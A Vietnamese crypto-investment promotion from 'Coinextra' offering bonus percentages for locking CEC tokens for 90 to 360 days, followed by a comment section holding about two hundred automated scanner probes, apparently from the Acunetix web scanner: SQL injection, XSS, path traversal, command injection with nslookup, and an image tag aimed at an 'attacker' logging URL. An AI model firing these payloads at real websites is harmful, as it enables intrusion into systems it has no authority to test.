COINEXTRA: ƯU ĐÃI KHI THAM GIA GÓI ĐẦU TƯ CEC

17/07/2019 - huy
1434
187

Để nhằm khuyến khích khách hàng tham gia Gói đầu tư CEC của CEE Investment Club, trong tháng 7 chúng tôi có những ưu đãi đặc biệt như sau:

 

  • Khách hàng tham gia gói đầu tư CEC thời hạn 90 ngày sẽ được tặng thêm 1%/gói bằng CEC Bonus.

 

  • Khách hàng tham gia gói đầu tư CEC thời hạn 180 ngày sẽ được tặng thêm 5%/gói bằng CEC Bonus.

 

  • Khách hàng tham gia gói đầu tư CEC thời hạn 360 ngày sẽ được tặng thêm 8%/gói bằng CEC Bonus.

 

Ví dụ: Bạn tham gia Gói Gold, số lượng đầu tư 2.000 CEC, thời hạn đầu tư 180 ngày thì ngoài lãi suất bạn nhận được theo gói, bạn sẽ được tặng thêm 5%*2.000 CEC = 100 CEC Bonus.

 

Lãi suất tặng thêm được trả vào tài khoản CEC Bonus.

 

Chúng tôi sẽ tiến hành tặng lãi suất cho những khách hàng tham gia gói đầu tư trong tháng 07 vào ngày 05.08.2019.

 

Để hiểu rõ chi tiết về các gói đầu tư, quý khách vui lòng liên hệ trực tiếp với chúng tôi qua inbox trên trang fanpage "CEC Investment"

 

Nếu có bất cứ thắc mắc nào vui lòng liên hệ với đội ngũ Support của chúng tôi hoặc gửi về email: Support@coinextra.net.

 

Trân trọng

CEE Team

Leave your comment
Comments
rwejbolu
rwejbolu
30/08/2019 14:21

1

rwejbolu
rwejbolu
30/08/2019 15:44

1

rwejbolu
rwejbolu
30/08/2019 15:44

1

rwejbolu
rwejbolu
30/08/2019 15:44

1

rwejbolu
rwejbolu
30/08/2019 15:44

1

rwejbolu
rwejbolu
30/08/2019 15:44

1

rwejbolu
rwejbolu
30/08/2019 15:44

uXVRiQkE

rwejbolu
rwejbolu
30/08/2019 15:44

1

rwejbolu
rwejbolu
30/08/2019 15:44

1

rwejbolu
rwejbolu
30/08/2019 15:44

1

rwejbolu
rwejbolu
30/08/2019 15:44

response.write(9758746*9177960)

rwejbolu
rwejbolu
30/08/2019 15:44

set|set&set

rwejbolu
rwejbolu
30/08/2019 15:44

'+response.write(9758746*9177960)+'

rwejbolu
rwejbolu
30/08/2019 15:44

$(nslookup 06uXl8U7)

rwejbolu
rwejbolu
30/08/2019 15:44

"+response.write(9758746*9177960)+"

rwejbolu
rwejbolu
30/08/2019 15:44

&nslookup 0Y0tPYmr&'\"`0&nslookup 0Y0tPYmr&`'

rwejbolu
rwejbolu
30/08/2019 15:44

1

rwejbolu
rwejbolu
30/08/2019 15:44

1

rwejbolu
rwejbolu
30/08/2019 15:44

1

rwejbolu
rwejbolu
30/08/2019 15:44

1

rwejbolu
rwejbolu
30/08/2019 15:44

1

rwejbolu
rwejbolu
30/08/2019 15:44

1

rwejbolu
rwejbolu
30/08/2019 15:44

1

rwejbolu
rwejbolu
30/08/2019 15:44

1

rwejbolu
rwejbolu
30/08/2019 15:44

${9999267+9999206}

rwejbolu
rwejbolu
30/08/2019 15:44

1

rwejbolu
rwejbolu
30/08/2019 15:44

1

rwejbolu
rwejbolu
30/08/2019 15:44

1

rwejbolu
rwejbolu
30/08/2019 15:44

1

rwejbolu
rwejbolu
30/08/2019 15:44

1

rwejbolu
rwejbolu
30/08/2019 15:44

1

rwejbolu
rwejbolu
30/08/2019 15:44

1

rwejbolu
rwejbolu
30/08/2019 15:44

1

rwejbolu
rwejbolu
30/08/2019 15:44

1

rwejbolu
rwejbolu
30/08/2019 15:44

1

rwejbolu
rwejbolu
30/08/2019 15:44

1

rwejbolu
rwejbolu
30/08/2019 15:44

1

rwejbolu
rwejbolu
30/08/2019 15:44

1

rwejbolu
rwejbolu
30/08/2019 15:44

1

rwejbolu
rwejbolu
30/08/2019 15:44

)

rwejbolu
rwejbolu
30/08/2019 15:44

1

rwejbolu
rwejbolu
30/08/2019 15:44

12345'"\'\");|]*{
<>�''💩

rwejbolu
rwejbolu
30/08/2019 15:44

!(()&&!|*|*|

rwejbolu
rwejbolu
30/08/2019 15:44

'"()

rwejbolu
rwejbolu
30/08/2019 15:44

1

rwejbolu
rwejbolu
30/08/2019 15:44

1

rwejbolu
rwejbolu
30/08/2019 15:44

1&n996380=v970928

rwejbolu
rwejbolu
30/08/2019 15:44

^(#$!@#$)(()))******

rwejbolu
rwejbolu
30/08/2019 15:44

1

rwejbolu
rwejbolu
30/08/2019 15:44

1

rwejbolu
rwejbolu
30/08/2019 15:44

1

rwejbolu
rwejbolu
30/08/2019 15:44

1

rwejbolu
rwejbolu
30/08/2019 15:44

1

rwejbolu
rwejbolu
30/08/2019 15:44

1

rwejbolu
rwejbolu
30/08/2019 15:44

../../../../../../../../../../windows/win.ini

rwejbolu
rwejbolu
30/08/2019 15:44

1

rwejbolu
rwejbolu
30/08/2019 15:44

C:\WINDOWS\system32\drivers\etc\hosts

rwejbolu
rwejbolu
30/08/2019 15:44

1

rwejbolu
rwejbolu
30/08/2019 15:44

1

rwejbolu
rwejbolu
30/08/2019 15:44

../../../../../../../../../../windows/win.ini.jpg

rwejbolu
rwejbolu
30/08/2019 15:44

http://some-inexistent-website.acu/some_inexistent_file_with_long_name?.jpg

rwejbolu
rwejbolu
30/08/2019 15:44

1

rwejbolu
rwejbolu
30/08/2019 15:44

1some_inexistent_file_with_long_name.jpg

rwejbolu
rwejbolu
30/08/2019 15:44

http://testasp.vulnweb.com/t/xss.html?%00.jpg

rwejbolu
rwejbolu
30/08/2019 15:44

;print(md5(acunetix_wvs_security_test));

rwejbolu
rwejbolu
30/08/2019 15:44

';print(md5(acunetix_wvs_security_test));$a='

rwejbolu
rwejbolu
30/08/2019 15:44

";print(md5(acunetix_wvs_security_test));$a="

rwejbolu
rwejbolu
30/08/2019 15:44

${@print(md5(acunetix_wvs_security_test))}

rwejbolu
rwejbolu
30/08/2019 15:44

${@print(md5(acunetix_wvs_security_test))}\

rwejbolu
rwejbolu
30/08/2019 15:44

Http://testasp.vulnweb.com/t/fit.txt

rwejbolu
rwejbolu
30/08/2019 15:44

1

rwejbolu
rwejbolu
30/08/2019 15:44

http://testasp.vulnweb.com/t/fit.txt?.jpg

rwejbolu
rwejbolu
30/08/2019 15:44

������������������������������������������������windows��win.ini

rwejbolu
rwejbolu
30/08/2019 15:44

1

rwejbolu
rwejbolu
30/08/2019 15:44

testasp.vulnweb.com

rwejbolu
rwejbolu
30/08/2019 15:44

1

rwejbolu
rwejbolu
30/08/2019 15:44

1

rwejbolu
rwejbolu
30/08/2019 15:44

1

rwejbolu
rwejbolu
30/08/2019 15:44

1

rwejbolu
rwejbolu
30/08/2019 15:44

1

rwejbolu
rwejbolu
30/08/2019 15:44

1

rwejbolu
rwejbolu
30/08/2019 15:44

1

rwejbolu
rwejbolu
30/08/2019 15:44

coinextra-uu-dai-khi-tham-gia-goi-dau-tu-cec.html

rwejbolu
rwejbolu
30/08/2019 15:44

1

rwejbolu
rwejbolu
30/08/2019 15:44

................windowswin.ini

rwejbolu
rwejbolu
30/08/2019 15:44

coinextra-uu-dai-khi-tham-gia-goi-dau-tu-cec.html

rwejbolu
rwejbolu
30/08/2019 15:44

1

rwejbolu
rwejbolu
30/08/2019 15:44

coinextra-uu-dai-khi-tham-gia-goi-dau-tu-cec.html/.

rwejbolu
rwejbolu
30/08/2019 15:44

1

rwejbolu
rwejbolu
30/08/2019 15:44

1'"

rwejbolu
rwejbolu
30/08/2019 15:44

http://hitM6fe6mVzzz.bxss.me/

rwejbolu
rwejbolu
30/08/2019 15:44

..\..\..\..\..\..\..\..\windows\win.ini

rwejbolu
rwejbolu
30/08/2019 15:44

/.\\./.\\./.\\./.\\./.\\./.\\./windows/win.ini

rwejbolu
rwejbolu
30/08/2019 15:44

1

rwejbolu
rwejbolu
30/08/2019 15:44

1

rwejbolu
rwejbolu
30/08/2019 15:44

1

rwejbolu
rwejbolu
30/08/2019 15:44

1

rwejbolu
rwejbolu
30/08/2019 15:44

\

rwejbolu
rwejbolu
30/08/2019 15:44

1

rwejbolu
rwejbolu
30/08/2019 15:44

1����%2527%2522

rwejbolu
rwejbolu
30/08/2019 15:44

/www.vulnweb.com

rwejbolu
rwejbolu
30/08/2019 15:44

1

rwejbolu
rwejbolu
30/08/2019 15:44

1

rwejbolu
rwejbolu
30/08/2019 15:44

../..//../..//../..//../..//../..//../..//../..//../..//windows/win.ini

rwejbolu
rwejbolu
30/08/2019 15:44

1

rwejbolu
rwejbolu
30/08/2019 15:44

../.../.././../.../.././../.../.././../.../.././../.../.././../.../.././windows/win.ini

rwejbolu
rwejbolu
30/08/2019 15:44

1

rwejbolu
rwejbolu
30/08/2019 15:44

)))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))))

rwejbolu
rwejbolu
30/08/2019 15:44

1

rwejbolu
rwejbolu
30/08/2019 15:44

1

rwejbolu
rwejbolu
30/08/2019 15:44

Sr3zB223

rwejbolu
rwejbolu
30/08/2019 15:44

@@s05NM

rwejbolu
rwejbolu
30/08/2019 15:44

1

rwejbolu
rwejbolu
30/08/2019 15:44

1

rwejbolu
rwejbolu
30/08/2019 15:44

1'"()&%<acx><ScRiPt >2XYv(9475)</ScRiPt>

rwejbolu
rwejbolu
30/08/2019 15:44

1

rwejbolu
rwejbolu
30/08/2019 15:44

JyI=

rwejbolu
rwejbolu
30/08/2019 15:44

'"

rwejbolu
rwejbolu
30/08/2019 15:44

�'�"

rwejbolu
rwejbolu
30/08/2019 15:44

<!--

rwejbolu
rwejbolu
30/08/2019 15:44

�''�""

rwejbolu
rwejbolu
30/08/2019 15:44

'"()&%<acx><ScRiPt >2XYv(9638)</ScRiPt>

rwejbolu
rwejbolu
30/08/2019 15:44

-1 OR 2+700-700-1=0+0+0+1 --

rwejbolu
rwejbolu
30/08/2019 15:44

19154884

rwejbolu
rwejbolu
30/08/2019 15:44

-1 OR 2+416-416-1=0+0+0+1

rwejbolu
rwejbolu
30/08/2019 15:44

-1' OR 2+279-279-1=0+0+0+1 --

rwejbolu
rwejbolu
30/08/2019 15:44

-1' OR 2+839-839-1=0+0+0+1 or 'KxkOgtM7'='

rwejbolu
rwejbolu
30/08/2019 15:44

-1" OR 2+926-926-1=0+0+0+1 --

rwejbolu
rwejbolu
30/08/2019 15:44

if(now()=sysdate(),sleep(9),0)/*'XOR(if(now()=sysdate(),sleep(9),0))OR'"XOR(if(now()=sysdate(),sleep(9),0))OR"*/

rwejbolu
rwejbolu
30/08/2019 15:44

(select(0)from(select(sleep(3)))v)/*'+(select(0)from(select(sleep(3)))v)+'"+(select(0)from(select(sleep(3)))v)+"*/

rwejbolu
rwejbolu
30/08/2019 15:45

-1; waitfor delay '0:0:3' --

rwejbolu
rwejbolu
30/08/2019 15:45

-1); waitfor delay '0:0:3' --

rwejbolu
rwejbolu
30/08/2019 15:45

-1)); waitfor delay '0:0:3' --

rwejbolu
rwejbolu
30/08/2019 15:45

1 waitfor delay '0:0:3' --

rwejbolu
rwejbolu
30/08/2019 15:45

unexisting/../../../../../../../../../../windows/win.ini.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\.\

rwejbolu
rwejbolu
30/08/2019 15:45

vnbr8zEt'; waitfor delay '0:0:3' --

rwejbolu
rwejbolu
30/08/2019 15:45

WEB-INF/web.xml

rwejbolu
rwejbolu
30/08/2019 15:45

v9Yzkued'); waitfor delay '0:0:6' --

rwejbolu
rwejbolu
30/08/2019 15:45

WEB-INF\web.xml

rwejbolu
rwejbolu
30/08/2019 15:45

omp55sz2')); waitfor delay '0:0:6' --

rwejbolu
rwejbolu
30/08/2019 15:45

acu8244<s1﹥s2ʺs3ʹuca8244

rwejbolu
rwejbolu
30/08/2019 15:45

-1;select pg_sleep(6); --

rwejbolu
rwejbolu
30/08/2019 15:45

-1);select pg_sleep(6); --

rwejbolu
rwejbolu
30/08/2019 15:45

-1));select pg_sleep(6); --

rwejbolu
rwejbolu
30/08/2019 15:45

-1));select pg_sleep(3); --

rwejbolu
rwejbolu
30/08/2019 15:45

-1));select pg_sleep(0); --

rwejbolu
rwejbolu
30/08/2019 15:45

-1));select pg_sleep(9); --

rwejbolu
rwejbolu
30/08/2019 15:45

HGlDxwzq';select pg_sleep(6); --

rwejbolu
rwejbolu
30/08/2019 15:45

5NnD1S3X');select pg_sleep(9); --

rwejbolu
rwejbolu
30/08/2019 15:45

I4tErdqw'));select pg_sleep(9); --

rwejbolu
rwejbolu
30/08/2019 15:45

341'

rwejbolu
rwejbolu
30/08/2019 15:45

1

rwejbolu
rwejbolu
30/08/2019 15:45

acux4066��z1��z2a�bcxuca4066

rwejbolu
rwejbolu
30/08/2019 15:45

1

rwejbolu
rwejbolu
30/08/2019 15:45

CWS000x�=�1N�@E߮��I)�@��  �HiP"D�F� G&َ7��܂�rX;!S��̛����7Jq���.�>�p�c�l��zG�ܾM�dkj�,��(��T�Jj)�"�T7$��H�D6)� x)��ؒ�\C�|�Q�Nc�b��� b_&�5 h��g�
]s��0Q�L<�6�L�_�w~�[�/[�m{����:n-����.�d1d��?6�0

rwejbolu
rwejbolu
30/08/2019 15:45

{{10000043*10000290}}

rwejbolu
rwejbolu
30/08/2019 15:46

1<ScRiPt >2XYv(9691)</ScRiPt>

rwejbolu
rwejbolu
30/08/2019 15:46

1<WALHA7>ORJDJ[!+!]</WALHA7>

rwejbolu
rwejbolu
30/08/2019 15:46

1<script>2XYv(9089)</script>

rwejbolu
rwejbolu
30/08/2019 15:46

1<ScR<ScRiPt>IpT>2XYv(9855)</sCr<ScRiPt>IpT>

rwejbolu
rwejbolu
30/08/2019 15:46

1<ScRiPt
>2XYv(9685)</ScRiPt>

rwejbolu
rwejbolu
30/08/2019 15:46

1<ScRiPt/acu src=//testasp.vulnweb.com/t/xss.js?9945></ScRiPt>

rwejbolu
rwejbolu
30/08/2019 15:46

1<ScRiPt
>2XYv(9011)</ScRiPt>

rwejbolu
rwejbolu
30/08/2019 15:46

1<video><source onerror="javascript:2XYv(9016)">

rwejbolu
rwejbolu
30/08/2019 15:46

1<svg  

�onload=2XYv(9668);>

rwejbolu
rwejbolu
30/08/2019 15:46

1<isindex type=image src=1 onerror=2XYv(9344)>

rwejbolu
rwejbolu
30/08/2019 15:46

1<iframe src='data:text/html;base64,PHNjcmlwdD5hbGVydCgnYWN1bmV0aXgteHNzLXRlc3QnKTwvc2NyaXB0Pgo=' invalid='9109'>

rwejbolu
rwejbolu
30/08/2019 15:46

1<body onload=2XYv(9123)>

rwejbolu
rwejbolu
30/08/2019 15:46

1<img src=//testasp.vulnweb.com/t/dot.gif onload=2XYv(9599)>

rwejbolu
rwejbolu
30/08/2019 15:47

1<img src=xyz OnErRor=2XYv(9883)>

rwejbolu
rwejbolu
30/08/2019 15:47

1<img/src=">" onerror=alert(9169)>

rwejbolu
rwejbolu
30/08/2019 15:47

%31%3C%53%63%52%69%50%74%20%3E%32%58%59%76%289340%29%3C%2F%73%43%72%69%70%54%3E

rwejbolu
rwejbolu
30/08/2019 15:47

1\u003CScRiPt\2XYv(9918)\u003C/sCripT\u003E

rwejbolu
rwejbolu
30/08/2019 15:47

1&lt;ScRiPt&gt;2XYv(9491)&lt;/sCripT&gt;

rwejbolu
rwejbolu
30/08/2019 15:47

�<img acu onmouseover=2XYv(9550) //�>

rwejbolu
rwejbolu
30/08/2019 15:47

1<input autofocus onfocus=2XYv(9533)>

rwejbolu
rwejbolu
30/08/2019 15:47

<a HrEF=http://www.vulnweb.com></a>

rwejbolu
rwejbolu
30/08/2019 15:47

<a HrEF=jaVaScRiPT:>

rwejbolu
rwejbolu
30/08/2019 15:47

[url=http://www.vulnweb.com][/url]

rwejbolu
rwejbolu
30/08/2019 15:48

1<img<!-- --> src=x onerror=alert(9859);//><!-- -->

rwejbolu
rwejbolu
30/08/2019 15:48

1}body{acu:Expre/**/SSion(2XYv(9815))}

rwejbolu
rwejbolu
30/08/2019 15:48

1<% contenteditable onresize=2XYv(9455)>

rwejbolu
rwejbolu
30/08/2019 15:48

1oL41s
<ScRiPt >2XYv(9952)</ScRiPt>

rwejbolu
rwejbolu
30/08/2019 15:48

1<WCFNCB>ZTCO5[!+!]</WCFNCB>

rwejbolu
rwejbolu
30/08/2019 15:48

1<ifRAme sRc=9502.com></IfRamE>

rwejbolu
rwejbolu
30/08/2019 15:48

1<dw6LUI x=9339>

rwejbolu
rwejbolu
30/08/2019 15:48

1<img sRc='http://attacker-9064/log.php?